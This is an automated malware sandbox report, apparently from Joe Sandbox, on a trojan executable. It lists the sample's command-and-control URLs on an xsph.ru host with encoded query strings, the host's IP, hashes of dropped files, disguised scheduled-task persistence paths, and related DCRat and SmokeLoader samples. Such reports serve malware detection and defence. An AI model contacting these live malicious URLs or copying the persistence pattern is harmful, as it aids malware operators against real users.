            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W100%Avira URL Cloudmalware
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W100%Avira URL Cloudmalware
            http://a0985701.xsph.ru/8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgL100%Avira URL Cloudmalware
            http://a0985701.xsph.ru/@=AzYyIGNycDO4%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            a0985701.xsph.ru
            141.8.192.26
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3Wtrue
            • Avira URL Cloud: malware
            unknown
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3Wtrue
            • Avira URL Cloud: malware
            unknown
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3Wtrue
            • Avira URL Cloud: malware
            unknown
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3Wtrue
            • Avira URL Cloud: malware
            unknown
            http://a0985701.xsph.ru/@=AzYyIGNycDOtrue
            • 4%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://a0985701.xsph.ru/qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmptrue
            • 11%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://a0985701.xsph.ruqVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmptrue
            • 11%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e6qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameblockServerruntime.exe, 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://a0985701.xsph.ru/8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLqVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            141.8.192.26
            a0985701.xsph.ruRussian Federation
            35278SPRINTHOSTRUtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1447088
            Start date and time:2024-05-24 11:06:09 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 34s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:N0tepkRPzw.exe
            renamed because original name is a hash value
            Original Sample Name:4b173aaa031de977353ca903f23520e4.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@34/19@1/1
            EGA Information:
            • Successful, ratio: 20%
            HCA Information:
            • Successful, ratio: 55%
            • Number of executed functions: 356
            • Number of non-executed functions: 90
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target blockServerruntime.exe, PID 7436 because it is empty
            • Execution Graph export aborted for target qVUjshNEHYUOCXyHyUMQwFlZoe.exe, PID 7604 because it is empty
            • Execution Graph export aborted for target qVUjshNEHYUOCXyHyUMQwFlZoe.exe, PID 7628 because it is empty
            • Execution Graph export aborted for target qVUjshNEHYUOCXyHyUMQwFlZoe.exe, PID 7992 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            05:07:07API Interceptor2389586x Sleep call for process: qVUjshNEHYUOCXyHyUMQwFlZoe.exe modified
            10:07:04Task SchedulerRun new task: qVUjshNEHYUOCXyHyUMQwFlZoe path: "C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
            10:07:04Task SchedulerRun new task: qVUjshNEHYUOCXyHyUMQwFlZoeq path: "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
            10:07:07Task SchedulerRun new task: RuntimeBroker path: "C:\Windows\addins\RuntimeBroker.exe"
            10:07:07Task SchedulerRun new task: RuntimeBrokerR path: "C:\Windows\addins\RuntimeBroker.exe"
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            141.8.192.26PO17276_1.xlsxGet hashmaliciousUnknownBrowse
            • a0914823.xsph.ru/gnTMibhIiOzpiLP.exe
            SecuriteInfo.com.Win32.Evo-gen.8496.14358.exeGet hashmaliciousSmokeLoaderBrowse
            • a0907287.xsph.ru/logo5.jpg
            SecuriteInfo.com.Win32.PWSX-gen.5385.30597.exeGet hashmaliciousSmokeLoaderBrowse
            • a0907287.xsph.ru/logo5.jpg
            SecuriteInfo.com.Win32.TrojanX-gen.7072.18749.exeGet hashmaliciousSmokeLoaderBrowse
            • a0907287.xsph.ru/logo5.jpg
            SecuriteInfo.com.Win32.TrojanX-gen.31311.19858.exeGet hashmaliciousSmokeLoaderBrowse
            • a0907287.xsph.ru/logo5.jpg
            INV_568790.docGet hashmaliciousAgentTesla, NSISDropperBrowse
            • a0862713.xsph.ru/ikeolive2.1.exe
            z35INV-A66G-B100.exeGet hashmaliciousFormBookBrowse
            • www.edunaberu.ru/rudh/?DMeivvtJ=Qb71IDR1ga914x9jJav7ZQHcC3mf/ed4A6zWICGLDRYD2yYRZk0hL6cqBbjUi/cBqZKD2YXD8Fm/1DQGVxm9xs0aXvoVpD5urw==&4A2NU=8-R860
            https://drive.google.com/file/d/1nqpk7RY2QNDanRjehWlT7FCVTr0VWDO4/view?usp=sharingGet hashmaliciousUnknownBrowse
            • a0698327.xsph.ru/imn/m/assets/images/img.jpg
            bkXzo46fUj.exeGet hashmaliciousAzorultBrowse
            • a0528438.xsph.ru/index.php
            bPIaXZBdd0.exeGet hashmaliciousUnknownBrowse
            • a0519283.xsph.ru/gate.php
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            SPRINTHOSTRUYEaSisD9EC.exeGet hashmaliciousDCRatBrowse
            • 141.8.192.6
            fZJdSLj7X8.exeGet hashmaliciousDCRatBrowse
            • 141.8.192.26
            tlSO7495aR.exeGet hashmaliciousDCRatBrowse
            • 141.8.192.126
            Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 141.8.192.82
            dIg0MWRViP.exeGet hashmaliciousTofseeBrowse
            • 141.8.199.94
            rpzOeQ5QzX.exeGet hashmaliciousTofseeBrowse
            • 141.8.199.94
            ckx1nc2UXk.exeGet hashmaliciousBlank Grabber, DCRat, Umbral Stealer, XWormBrowse
            • 141.8.192.103
            qxHQmnOvjL.exeGet hashmaliciousDCRatBrowse
            • 141.8.195.33
            9hupFTW1CI.exeGet hashmaliciousDCRatBrowse
            • 141.8.192.93
            l35QvlkTXb.exeGet hashmaliciousDCRatBrowse
            • 141.8.197.42
            No context
            No context
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:ASCII text, with very long lines (613), with no line terminators
            Category:dropped
            Size (bytes):613
            Entropy (8bit):5.890045828119624
            Encrypted:false
            SSDEEP:12:V6CXFfMpllSNxL8tmVIjX5C+93ZPY8WtQb7dqk3fAKYXXY/yn:c0MpllSNF8tP593ZPWtQqq4K+XL
            MD5:C17DEBEB7D3B23062C057988F4D66ED5
            SHA1:3F29B4465BEC3D39B68DB04AB489AC73400B7531
            SHA-256:7E05ABAB79B820C6984D8CA422C42B4DDC7319E666C440BD7F7EFADD3B1FBD37
            SHA-512:23C8B555C665ED3E0EA9964913F1970200FD44131EB57DB8FC93DA0CA13F179BE8637FA0901F9C35368160601F4C5FDD4809D0FA91450CF7DD4CC9978781877E
            Malicious:false
            Preview:YQDtjI1l9MZ3TEHp1EcBK6QTvWTjK7ATeuoxcUnv5NoqaCn8FChShLbcAu8NzSaBLGYiaTMhaqG6Sj2ssUeIZrwSTMxsWa6mwmfUnFiv0A11FeJa2PefySldTGONfeKAudKpEiEmvsRZz4NyCX0G6axdBBAh0UQW01GlUeVTL1tGAMnY2aLInEDTpqnChgwac5i8yleiBg5EqrczXloaJHsvxx5o0SwoFSoFnpkR6nHHJ9m8Nyp61VRUNxKApzrsuQ8XCXLrAXegAkmyK6bBn0wtBT10fkmG5ZX2BO6zn75e1uUnLVzsYqE3dOVtgVLauXlkMtx6AlYp4R1R8OpJu3sPUdZw2NTRvfueJuabi3rwRY9LWEuRqBp1oWQtUADxSH4ZhXIOyNl1L675eNZycBltz2zwdrHiz4dKeko95fcdaypsYUOGkPUQgKjohVuHFCBRcxb4ja26iHTANGYJcA7kjNoUA9bkuVXXxXQk3UhKXXrY0jab6lpFFbrPJG3j8SMNu5N00yQHcwMLfQdbiAnJqRSVpBbwb8LELen5VkkIVimTOgt3ncB8pChcn2KzWeqekI9BmiG7ZeyIp8GJRiI86NZI7KRcavv11
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1257984
            Entropy (8bit):6.954385369050077
            Encrypted:false
            SSDEEP:24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
            MD5:A6A0FB77338508B4185FE94263AA2D0F
            SHA1:0410A23443DE08D9CA311D2AEF1264232D4014A4
            SHA-256:5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
            SHA-512:D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
